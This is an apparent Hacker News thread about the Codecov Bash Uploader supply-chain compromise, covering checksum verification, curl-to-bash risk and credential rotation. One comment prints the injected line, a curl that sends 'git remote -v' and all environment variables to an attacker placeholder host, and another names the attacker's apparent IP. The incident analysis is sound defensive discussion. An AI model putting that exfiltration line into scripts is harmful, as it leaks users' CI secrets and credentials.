Hacker News new | past | comments | ask | show | jobs | submit login
Codecov Bash Uploader compromised (codecov.io)
198 points by xiaq 7 months ago | hide | past | favorite | 77 comments



> How did Codecov learn of this event?

> A customer reported this to us on the morning of April 1, 2021. This customer was using the shasum that is available on our Bash Uploader to confirm the integrity of the uploader fetched from https://codecov.io/bash.

> Once the customer saw a discrepancy between the shasum on Github and the shasum calculated from the downloaded Bash Uploader, they reported the issue to us, which prompted our investigation.

shoutout to this user for actually checking the shasum


So it took 3 months from the initial modification until someone bothered to check the shasum of their download?!?


Of all the people in tech I know as friends or professionals I know of exactly one guy who is diligent about comparing checksums and it's the same guy with a multi thousand dollar homelab. Absolutely nobody is doing this frequently unless they've automated it or they have an obsession with privacy (to be fair, nothing wrong with that, just that it's exceptionally rare).


I guess I'm unusual - I check hashes of manually downloaded files if the domain I'm downloading from isn't the same as the domain with the download link. It only takes 5 seconds, and saves me from partial downloads too (you'd be amazed how many files kinda-almost work but have odd bugs if half downloaded)


Why they're not continuously checking it is beyond me.


It seems like this would be a nice small service. Publicly compare checksums of software and flag/notify for misalignment. And maybe make it easier for people to grab the checksums for packages and check it themselves.

Edit: I just bought hecksum.com.


Public key signatures would be even better. Then you only need to install / audit / trust the public key once, versus updating the checksum for every new release. Of course, this assumes that signing isn't compromised too, if that's the case then you're pretty much out of luck since a malicious release would be superficially indistinguishible from a real release.


Well, that is what happened in the case of SolarWinds -- legit signatures on the dll that was modified early in the supply-chain. :-(


Here's[1] one way to actually curl + checksum then run in a Dockerfile, in case anyone wants it:

  RUN curl --location --show-error --silent --output get-poetry.py https://raw.githubusercontent.com/python-poetry/poetry/master/get-poetry.py \
      && echo '08336beb0091ab192adef2cedbaa3428dabfc8572e724d2aa7fc4a4922efb20a get-poetry.py' > get-poetry.py.sha256 \
      && sha256sum --check get-poetry.py.sha256 \
      && python3 get-poetry.py \
      && rm get-poetry.py get-poetry.py.sha256
[1] https://github.com/linz/geospatial-data-lake/blob/d3c5699ed8...


You can pipe directly into sha256sum, no need to write-read-delete a file:

  RUN curl --location --show-error --silent --output get-poetry.py https://raw.githubusercontent.com/python-poetry/poetry/master/get-poetry.py \
      && echo '08336beb0091ab192adef2cedbaa3428dabfc8572e724d2aa7fc4a4922efb20a get-poetry.py' | sha256sum --check \
      && python3 get-poetry.py \
      && rm get-poetry.py
Also this code is weird because it grabs the script from master and expects its hash to not change. It should probably grab a specific version of it, e.g. https://raw.githubusercontent.com/python-poetry/poetry/8b479... to avoid the code breaking and needing manual update every time Poetry makes a change to their repo.


Right, but, unless GitHub itself is majorly compromised (in which case checking the bash checksum doesn’t help), doesn’t having the commit SHA in the URL make the whole exercise pointless anyway?


Thanks for the sha256sum tip - I checked the man page, but it doesn't mention that it reads from standard input by default (only when passing the filename "-").

The code has only changed once in the few months I've been using it. Also, if we get a specific version we'd need an extra process to know when it's been updated. So for the current project it's pragmatic to just use the latest version.


It took CodeCov 2 months to notice and only because a customer was checking sha. Then it took them 2 more weeks to notify customers. If they blocked the attack vector during that time then the attacker had a heads up to use credentials before customer's rotated.

This is not a good look for CodeCov.

edit: It seems not even their own code that used the bash uploader (github action, circleci orb, etc.) checked the sha sum. No excuse about lack of user friendliness there.


And they did not fix the code of their own runners (like GHA) to check the SHA sum either..


What were they doing for 2 weeks?


So, on "rotate your credentials", some of the things you'll need to do:

- Does your CI job query any system using a service account? Time to rotate that service account password. Hope it wasn't used by anything other than your CI system!

- Accessing systems using tokens instead of service accounts? Time to figure out how to invalidate those old tokens and gen a new one. (Also, time to find out if all the systems you use can do that)

- Using credentials as part of your build system, like downloading a for-pay plugin for a tool using a license key? Time to rotate those too.

- Time to rotate any license keys used at build-time.

- I hope you weren't using IAM users! If you weren't using instance profiles / task profiles, time to rotate those secret access keys. (some things you have to use IAM users for, like SES, iirc)

- Time to invalidate everything you built since they were first compromised, invalidate all your caches, and re-build all your artifacts from scratch.

- Time to see if you had any customer information / PII / PHI /etc accessible from your CI system.

- If you deploy from your CI system, it could be that every system is potentially compromised. In which case, get ready to re-deploy everything after you have flushed and re-built everything from above step.

- Start auditing, get PR to start drafting a sad letter to customers, and get someone to investigate how to reset customer passwords etc if needed.


Haha, yup. And if you sign an Android app in CI, Codecov might have had access to your signing keys. Good luck changing those.


Building the entire backbone of a CI product based on `bash <(curl` script. Honestly. This is more like Play stupid games, win stupid prizes. Did someone even attempt to google "don't run random scripts from the internet" here?

There is a world of a difference between offering a "bash <(curl" for one-off development/laptop use vs. giving official instructions to put it in a automation scripts. If someone is uploading code coverage reports for some language – they have way better, safer options. Maven packages, `go run`, npm packages, deb packages, etc. All of these have better security and checksumming built in.

From what's seen in the report, even all their other products (github app, etc) were built on top of this bash uploader script, and even their own hosted solutions did not validate their checksum. Looks like they were pretty seriously pushing "just source a script from internet" as an official principle. Of course the CI was backdoored. Facepalm.


"bash <(curl" is the new cool. Mind-boggling number of projects pull this sh*, look at https://brew.sh/ for instance.


It took me a while to find this link, as helpfully the one they emailed out is checking some referral code and currently 500'ing.

I think we're probably okay as we're an open source project, do pure testing on cloud CI's, and use the separate (non-bash) modules internally. Potentially compromising the GitHub app connection does sound immediately worrying, because of GitHub's terribly lax token permissions (e.g. the "All repositories or Nothing" access) - if they saw what the app connection could see, would they be able to see all private repos?

I'm somewhat sympathetic to sites that suggest curl | bash as a once-off installation. Advocating that your users curl | bash every time you test your code does sound quite a bit more irresponsible.


Interesting that no hash/checksum verification has been added in their CI actions, like here, yet: https://github.com/codecov/codecov-action/blob/master/src/in...


Looks like a PR [1] was started 4 hours ago but for such a simple task not much progress has been made.

Security breaches happen. If it hasn't happened yet consider it luck. I'm disappointed by the lack of urgency in the response and failure to take nominal steps in improving their posture.

I hope this is a wake up call for them and other Saas companies.

[1]https://github.com/codecov/codecov-action/pull/282


From Eli Hooten, CodeCov's CTO, in a personal message:

> Based on the nature of this attack I do not believe malicious actions were executed directly against the CI pipeline, nor do we have any evidence of it. I have included the malicious bash script for your review so you can fully understand the scope of the attack. Of interest is line 525

> line 525 was the only change we've observed. I have removed the IP address in the curl command as it is part of an ongoing federal investigation

Compromised script: https://gist.github.com/davidrans/ca6e9ffa5865983d9f6aa00b7a...

And here's line 525:

  curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http://ATTACKERIP/upload/v2 || true


So the hackers stole every environment variable for the context in which the Codecov script was run.

It means that if you use CI to deploy your code, all of your credentials have been leaked.


Why doesn’t GitHub Actions limit the environment variables it exposes to jobs/steps? The codecov step doesn’t need my GitHub or PyPI tokens! Environment variables should be opt-in for every step in the pipeline: I should have to explicitly list every environment variable I want to expose. This leak is as much on GitHub as it is on Codecov


GitHub actually introduced "Environments" recently, which allow you to do what you are asking for. Lots of existing pipelines haven't migrated yet of course.

https://docs.github.com/en/actions/reference/environments


Nice!


GitHub Actions actually requires you to explicitly pass secrets to individual steps. If you're using GitHub Actions, what got leaked was the commit metadata, and the codecov token itself. Unless you manually passed the entire environment to the codecov step, that is.


Most CI sytems have Github Token as an environment variable. That provides a second layer of attack.

Attacker by this time could have cloned all repositories, so whatever config, credentials, service account files or anything inside these repos are also assumed to be compromised. Not just environment variables.


This is really unfortunate. Using a curl to fetch executable code from a static URL is dangerous for a lot of reasons, but doing it on every CI run is... asking for trouble.

That said, I’m sure tons of folks will say the same thing. But any dynamically fetched code/modules/packages will suffer the same risk. While we have to be vigilant with those risks, there’s a more important step we can take and that’s to stop using static credentials for things like CI.

Instead, we need to be building and using tools that can generate time-bounded temporary credentials. For example, today it’s common to put your AWS IAM user key and secret directly into Github’s secret storage where it feeds directly into environment variables that can leak through this sort of attack. Instead, GitHub should provide a way to delegate access to fetch temporary credentials that are only valid for a few minutes from AWS STS. Amazon has multiple ways to make this happen, but GitHub needs to support it and GitHub’s users would need to use it.

And sure, AWS is just one of many secrets you probably have to work with, but GitHub and GitLab are in a position to make this sort of dynamic secret infra really commonplace and severely cut back on the damage these sorts of exploits can do, so I hope they are making that effort.


> But any dynamically fetched code/modules/packages will suffer the same risk.

A package manager usually employs signatures. In that case, the problem could have been avoided (unless the signing process itself is also compromised, then you're out of luck).


The issue only happens if the package manager platform is hacked rather than an individual package maintainer's credentials. The latter usually requires a new version to be pushed which people will notice and ask about (it's happened before). If the package manager platform is hacked then you're in trouble unless you employ a lock file.


Considering the data at risk, the delay in notifying users was too long. That's 15 days in which the hacker was made aware to hastily make use of their stolen data.


> How do I know what environment variables of mine may have been available to the actor? Collapse

> You can determine the keys and tokens that are surfaced to your CI environment by running the env command in your CI pipeline. If anything returned from that command is considered private or sensitive, we strongly recommend invalidating the credential and generating a new one. Additionally, we would recommend that you audit the use of these tokens in your system.

Be aware that the output will be sent to your CI output logs. If those logs are public (e.g. a FOSS project) then they will be publicly published and expose all your environment secrets.


Most (all?) major CI providers automatically censor secrets printed in the worker log, so this is not as much of a concern. :)


> How do I know what environment variables of mine may have been available to the actor?

Isn't that a tiny portion of what you would have to worry about? They seem too confident that they know exactly what unintended code was in the bash uploader script for the entire duration. Is there something about the setup that gives them that confidence?


> How did Codecov learn of this event?

> A customer reported this to us on the morning of April 1, 2021. This customer was using the shasum that is available on our Bash Uploader to confirm the integrity of the uploader fetched from https://codecov.io/bash.

> Once the customer saw a discrepancy between the shasum on Github and the shasum calculated from the downloaded Bash Uploader, they reported the issue to us, which prompted our investigation.

Just goes to show that checking published hashes is not as useless as it may seem.


> Just goes to show that checking published hashes is not as useless as it may seem.

It's better than nothing but if the first script that you are fetching is itself fetching other scripts without validation, you have the same problem, just hidden one level deeper.


I wish they'd release the code that was modified so a threat assessment can be made



Curious how you found that. Great find though. This is the exact line:

https://gist.github.com/davidrans/ca6e9ffa5865983d9f6aa00b7a...



I'm curious if they even know right now or if the code was being injected dynamically somehow. The post is sparse on the details.


Unfortunately archive.org last fetched the script in November last year: https://web.archive.org/web/2020*/https://codecov.io/bash

A quick diff against the current version doesn't show anything suspicios


> Codecov takes the security of its systems and data very seriously and we have implemented numerous safeguards to protect you.

Right at the start of the article - classic bit of corporate/PR BS to insulate the actually important information


It would be interesting to see what the compromised version of the bash script did, and how, more specifically.

Software supply chain attacks seem to become more common. I guess it's no surprise, considering how powerful an attack vector it is.


An advanced attack would fetch more code from a remote server, and that extra code would be client specific.

It would probably just open up a reverse shell or something like that so the attackers server can do whatever it likes and its much harder to analyze exactly what has been stolen.

The logic of what to steal could vary based on the environment etc.


> It would probably just open up a reverse shell or something like that

Codecov is a service meant to be run in CI, so your reverse shell would just be running in a GitHub/GitLab/... CI job. Not very interesting. You can however grab tokens from the environment that will give you access to the GitHub/GitLab/... repositories, which is much more valuable than getting a shell.

It looks like it's exactly what they did: https://news.ycombinator.com/item?id=26825432


Trying to suss out the damage but getting 502. Begs the question of who's deploying static sites not behind a CDN? Assuming this site is static


And their page is down so I can't find out any details. Great.


I know. I got the email and tried to follow the link. It would've been good to include all the information in the email.


copypasta here:

About the Event Codecov takes the security of its systems and data very seriously and we have implemented numerous safeguards to protect you. On Thursday, April 1, 2021, we learned that someone had gained unauthorized access to our Bash Uploader script and modified it without our permission. The actor gained access because of an error in Codecov’s Docker image creation process that allowed the actor to extract the credential required to modify our Bash Uploader script.

Immediately upon becoming aware of the issue, Codecov secured and remediated the affected script and began investigating any potential impact on users. A third-party forensic firm has been engaged to assist us in this analysis. We have reported this matter to law enforcement and are fully cooperating with their investigation.

Our investigation has determined that beginning January 31, 2021, there were periodic, unauthorized alterations of our Bash Uploader script by a third party, which enabled them to potentially export information stored in our users' continuous integration (CI) environments. This information was then sent to a third-party server outside of Codecov’s infrastructure.

The Bash Uploader is also used in these related uploaders: Codecov-actions uploader for Github, the Codecov CircleCl Orb, and the Codecov Bitrise Step (together, the “Bash Uploaders”). Therefore, these related uploaders were also impacted by this event.

The altered version of the Bash Uploader script could potentially affect:

Any credentials, tokens, or keys that our customers were passing through their CI runner that would be accessible when the Bash Uploader script was executed. Any services, datastores, and application code that could be accessed with these credentials, tokens, or keys. The git remote information of repositories using the Bash Uploaders to upload coverage to Codecov in CI. Recommend Actions for Affected Users Because of our commitment to trust and transparency, we have worked diligently to determine the potential impact to our customers and identify customers who may have used the Bash Uploaders during the relevant time periods. For affected users, we have emailed you on April 15th using you email address on file from Github / Gitlab / Bitbucket, and there is a notification banner after you log in to Codecov.

We strongly recommend affected users immediately re-roll all of their credentials, tokens, or keys located in the environment variables in their CI processes that used one of Codecov’s Bash Uploaders.

You can determine the keys and tokens that are surfaced to your CI environment by running the env command in your CI pipeline. If anything returned from that command is considered private or sensitive, we strongly recommend invalidating the credential and generating a new one. Additionally, we would recommend that you audit the use of these tokens in your system.

Additionally, if you use a locally stored version of a Bash Uploader, you should check that version for the following:

curl -sm 0.5 -d “$(git remote -v)

If this appears anywhere in your locally stored Bash Uploader, you should immediately replace the bash files with the most recent version from https://codecov.io/bash.

If you use a self-hosted (on-premises) version of Codecov, it is very unlikely you are impacted. To be impacted, your CI pipeline would need to be fetching the Bash Uploader from https://codecov.io/bash instead of from your self-hosted Codecov installation. You can verify from where you are fetching the Bash Uploader by looking at your CI pipeline configuration.

If you conducted a checksum comparison before using our Bash Uploaders as part of your CI processes, this issue may not impact you.

Actions Taken by Codecov We have taken a number of steps to address this situation including:

rotating all relevant internal credentials, including the key used to facilitate the modification of the Bash Uploader; auditing where and how the key was accessible; setting up monitoring and auditing tools to ensure that this kind of unintended change cannot occur to the Bash Uploader again; and working with the hosting provider of the third-party server to ensure the malicious webserver was properly decommissioned. Codecov maintains a variety of information security policies, procedures, practices, and controls. We continually monitor our network and systems for unusual activity, but Codecov, like any other company, is not immune to this type of event. We are also working to further enhance security so we can stay ahead of this type of activity, including reinforcing our security tools, policies, and procedures.

We will continue to share with you as much information as we are able and encourage you to reach out to us with any questions or concerns you have at security@codecov.io.

We value the trust you place in us and our solutions and pledge to continuously work to earn it. We regret any inconvenience this may cause and are committed to minimizing any potential impact on you, our users and customers.

Sincerely, Jerrod Engelberg CEO, Codecov


I'm Jerrod Engelberg, CEO of Codecov, and I'm confirming the above is factual. Sorry about the outage on the details page.


Why did you wait 2 weeks to notify us?


Can you please tell users which repositories were affected? This situation is ridiculous for users with dozens repositories, using various CIs and various code coverage providers. A lot of checking, cleaning, rotating. The way you disclosed the issue is not helpful.


How would they do that? The bash script is a static file on a public host. Users can simply download it, without Codecov knowing about the repos it's being used in.

Never automatically download any remote code without at least checking the checksum.


The e-mail they sent includes "Unfortunately, we can confirm that you were impacted by this security event." which means that they know. I guess there is an API endpoint that is specific to Bash Uploader and they use that + dates of API requests to figure out who was impacted. This must also contain the repository info (and they just confirmed that they can figure this out).


That may be wrong. I use the ruby gem and the email says that would not be affected but at the same time the email says I was affected. I'm re-rolling to be sure, but it would help not having conflicting information in the same email.


Hey, yes we can help you with figuring out which repos, there is an FAQ in the post about this, or you can email us at security [at] codecov.io.


Could you tell us how you determined who has or has not been affected?


> The actor gained access because of an error in Codecov’s Docker image creation process that allowed the actor to extract the credential required to modify our Bash Uploader script.

Docker layers hiding secrets is a big problem. Any solution other than education?


Clean room builds. Set up an environment with no access to anything (other than a NAT gateway). Copy only the files needed to do the build into the environment. Run the build. At the end of the build, capture the artifacts. Tear it all down at the end.

For a Docker container, that might look like:

  1. Create an EC2 instance with no IAM permissions, and a user with ~/.ssh/authorized_keys to allow copying in files.
  2. Install Docker.
  3. Copy all files for your build to the host. Make sure not to copy any secrets (!).
  4. Run the 'docker build'.
  5. Set up remote registry authentication.
  6. 'docker push' the built image to the remote registry.
In that environment, the only "secrets" you can bring along into the container came when you copied files to the EC2 instance (which shouldn't have been there, just like secrets shouldn't be in your source code). So then you also make sure the process that preps your files for copying also contains no secrets.


This: a whole separate machine might be overkill, but try your hardest to make your build not require secrets, and run it where the secrets aren't. This is usually not too hard, as you can use other methods to restrict access to whatever remote files the build needs to access.

Even for my local manual builds, I started doing this from fresh git-worktrees that I do no development in, as .env/.git/.log files tend to accumulate in your development copy and are very easy to put in the Docker image by mistake.


Basically what you want is a Docker image static analysis tool in your CICD that rejects your pull request if it seems to contain a secret.

I'm not really sure what would be the best tool for this, but googling got me to https://sysdig.com/blog/20-docker-security-tools/ which has enough scanning tools to research. I don't think any will be foolproof though.

Maybe you can also do what this guy did, use conftest with some OPA rules to detect what seems like a secret: https://cloudberry.engineering/article/dockerfile-security-b...

If your secrets all follow RFC 8959 ( https://tools.ietf.org/html/rfc8959 ) then you could make it fool proof by just searching for secret-token: with the tool from the previous blog post. However I've yet to find a place that uses this RFC for all secrets.


- If you don't care about the layer cache, flattening the image can get rid of things from intermediate layers

- If you're using buildkit, there's secret support there https://docs.docker.com/develop/develop-images/build_enhance...


I know, but these solutions rely on developers being aware and follow best practices in the first place.

The problem is anything that's not default on or at least in the getting started guide is going to be missed by a significant chunk of the userbase, so it's important to make security as automatic as possible. GitHub token scanning is nice for limiting secrets exposure in public git repos, for instance.


In general your secrets should expose the minimum access needed for the actions to be performed. For a docker build that'd likely be reading rather than writing data. Short term rotated credentials over long term credentials.

The goal is defense in depth so that even if a secret is leaked the damage is minimal.


do they mean that the Docker image at https://github.com/codecov/codecov-action contained a secret allowing someone to modify the script served by https://codecov.io/bash ?


Bleeping Computer may have identified the attackers IP in a screenshot? https://www.bleepingcomputer.com/news/security/popular-codec...

104.248.94.23


This is a very concerning trend. The reliance on external tools is causing them to be a much more frequent attack vector.

SolarWinds, the Github actions thing, this.


Is it safe to assume that https://codecov.io/env was not compromised?


Given other comments in this post, I think at this point it's not safe to assume that.


Does anyone have the bash uploader script on hand with version 20210309-2b87ace?


This looks to be that version: https://github.com/ehmicky/dev-tasks/blob/1f6cd2a9c7bc2146b7...

Though this was uploaded before April 1, and it doesn't appear to have any malicious code.


does anybody know the shasum of the infected version of that script?


"Is it safe to use Codecov systems and services?

Yes. Codecov takes the security of its systems and data very seriously and we have implemented numerous safeguards to protect them."


shouts to whoever is out there rotating keys since the announcement of this incident.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: